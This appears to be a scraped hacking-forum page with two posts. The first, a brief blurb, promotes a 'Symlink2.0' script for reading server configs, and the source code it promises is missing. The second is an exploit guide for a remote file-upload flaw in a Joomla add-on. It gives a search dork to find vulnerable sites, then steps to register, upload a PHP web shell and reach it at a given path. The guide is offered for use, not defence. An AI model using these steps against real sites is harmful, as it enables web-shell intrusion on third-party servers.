Script Symlink2.0 for Pentesting

Hi,
The Script Symlink2.0 is very useful in pentesting it give you resume of the config's server and more other things.
The source code :

Joomgalaxy Remote File Upload v1.2.0.5

Hi;
there is new upload bug in galaxy addons of joomla CMS
Dork: inurl:com_joomgalaxy#######################################

Exploitation :
First : You have to register in the site
example:

http://site/index.php?option=com_users&view=registration

Second:

go to the following link and create a new post, then go to input icon and upload your shell as follows shell.php

 http://site/index.php?option=com_joomgalaxy&view=addentry

Third: 

once the post is published go to the tab images and upload your shell in the following way: shell.php

http://site//administrator/components/com_joomgalaxy/assets/images/entry_manager/1345590149_icon_shell.php 

Enj0y
Ciao.